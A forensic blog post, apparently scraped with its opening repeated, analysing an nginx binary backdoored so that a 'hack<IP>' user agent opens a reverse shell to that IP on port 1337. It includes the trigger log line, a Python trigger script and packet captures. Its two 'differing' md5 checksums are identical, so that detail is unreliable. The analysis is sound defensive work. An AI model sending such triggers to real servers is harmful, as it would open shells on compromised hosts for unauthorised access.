Compromised Linux Server Forensic - Analyzing Uncommon Backdoor in HTTPD - Part 1
written by : Cr0security.com - Network Security Engineering Service | Server Hardening Service | Penetration Testing Service | Server Forensic Service | Software Engineering Service
Forewords Recently we're doing an investigation on one of our client's linux server, where the server has been compromised. Something interesting that we found is on httpd logs that makes we suspect the attacker has backdoored the elf binary of httpd (nginx-1.3.3). Elf (Executable and Linking Format) binary is widely used on most linux, for those who are unfamiliar with elf binary may read here http://en.wikipedia.org/wiki/Executable_and_Linkable_Format. Sometimes on any compromised systems, the attacker may backdoored this elf binary. Exaclty there are many method in making use of any elf binary as a backdoor, but we don't cover it here.
The Backdoored nginx-1.3.3 leaves by the Intruder
Basic Analysis, Getting to know what it does
From the result above we may figure out some strings that proved as our nginx elf binary has been backdoored, such as : "1337", "execl","hack","/bin/sh". The string : "hack" seems like related to those on nginx's access log :
nginx's access log :
Something uncommon is about the user agent that we've seen above, it's : "hack193.4.250.218"
Back to our gdb, we see that it's executing /bin/dash, check this out :
At this rate, we may guess that it's a possible a back connect /bin/dash to ip 193.4.250.218 ? to be more clear let's have a little modification on python script, let's change string hack193.4.250.218 into hack127.0.0.1
and then do a capture using tcpdump:
Analyzing from the tcpdump we may see something interesting :
interesting part is :
We just notice it's uncommon traffic to destination port : 1337 which it's a possible back connect attempt. To be more clear, let's try to listen on local port 1337 and then we execute fuzzme.py:
At this rate we already know the purpose of this malicious elf binary. Next we are going to be more detail analysis on this elf binary.
to be continue ...
written by : Cr0security.com - Network Security Engineering Service | Server Hardening Service | Penetration Testing Service | Server Forensic Service | Software Engineering Service
Forewords Recently we're doing an investigation on one of our client's linux server, where the server has been compromised. Something interesting that we found is on httpd logs that makes we suspect the attacker has backdoored the elf binary of httpd (nginx-1.3.3). Elf (Executable and Linking Format) binary is widely used on most linux, for those who are unfamiliar with elf binary may read here http://en.wikipedia.org/wiki/Executable_and_Linkable_Format. Sometimes on any compromised systems, the attacker may backdoored this elf binary. Exaclty there are many method in making use of any elf binary as a backdoor, but we don't cover it here.
The Backdoored nginx-1.3.3 leaves by the Intruder
Malicious elf binary is an elf binary used for malicious purpose, such
as for backdooring a server that has been compromised.
This short article will try to demonstrate the basic forensic which
includes a little knowledge on reversing little technology behind a
malicious linux elf binary on 32 bit machine running linux.
As our case study we will try to reveal a backdoored version of
nginx-1.3.3 elf binary.
A Simple way to check a malicious elf binary is by using md5checksum
comprison between malicious nginx elf binary and backup of original elf
binary
md5 checksum of malcious elf binary :
#md5sum /usr/local/nginx/sbin/nginx 85da53d843fc19bff9a25c80ec08c3b3 /usr/local/nginx/sbin/nginxand md5 checksum of original elf binary :
#md5sum /root/backup_of_original_nginx_elf_binary/nginx.old 85da53d843fc19bff9a25c80ec08c3b3 /root/backup_of_original_nginx_elf_binary/nginx.old
Basic Analysis, Getting to know what it does
As our basic check, we are going to use strings to check all strings of
printable characters from our suspected malicious elf binary and
original elf binary then we compare
it using diff.
The malicious elf binary path is /usr/local/nginx/sbin/nginx meanwhile
our original elf binary path is
/root/backup_of_original_nginx_elf_binary/nginx
~#strings /usr/local/nginx/sbin/nginx > /root/forensic/strings_from_malicious_elf.txt ~#strings /root/backup_of_original_nginx_elf_binary/nginx > /root/forensic/strings_from_backup_elf.txt
From the result above we may figure out some strings that proved as our nginx elf binary has been backdoored, such as : "1337", "execl","hack","/bin/sh". The string : "hack" seems like related to those on nginx's access log :
nginx's access log :
193.4.250.218 - - [08/Aug/2012:23:18:49 -0700] "GET / HTTP/1.1" 200 151 "-" "hack193.4.250.218"
Something uncommon is about the user agent that we've seen above, it's : "hack193.4.250.218"
Let's have more analysis on run time, what is executed by nginx's worker process
We will give some input testing by modifying user agent into : "hack193.4.250.218" using a simple python script to check whether we can see something from nginx worker process or no
fuzzme.py
We will give some input testing by modifying user agent into : "hack193.4.250.218" using a simple python script to check whether we can see something from nginx worker process or no
fuzzme.py
#!/usr/bin/python
import urllib2
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', 'hack193.4.250.218')]
response = opener.open('http://localhost')
Back to our gdb, we see that it's executing /bin/dash, check this out :
At this rate, we may guess that it's a possible a back connect /bin/dash to ip 193.4.250.218 ? to be more clear let's have a little modification on python script, let's change string hack193.4.250.218 into hack127.0.0.1
opener.addheaders = [('User-agent', 'hack127.0.0.1')]
and then do a capture using tcpdump:
#tcpdump -n -f -s 0 -X -vvv -i lo
Analyzing from the tcpdump we may see something interesting :
interesting part is :
127.0.0.1.35094 > 127.0.0.1.1337: Flags [S], cksum 0x4d22 (correct), seq 131492298, win 32792, options [mss 16396,nop,nop,TS val 1459556 ecr 0,nop,wscale 9], length 0 0x0000: 4500 003c 2cae 4000 4006 100c 7f00 0001 E..<,.@.@....... 0x0010: 7f00 0001 8916 0539 07d6 69ca 0000 0000 .......9..i..... 0x0020: a002 8018 4d22 0000 0204 400c 0101 080a ....M"....@..... 0x0030: 0016 4564 0000 0000 0103 0309 ..Ed........
We just notice it's uncommon traffic to destination port : 1337 which it's a possible back connect attempt. To be more clear, let's try to listen on local port 1337 and then we execute fuzzme.py:
At this rate we already know the purpose of this malicious elf binary. Next we are going to be more detail analysis on this elf binary.
to be continue ...
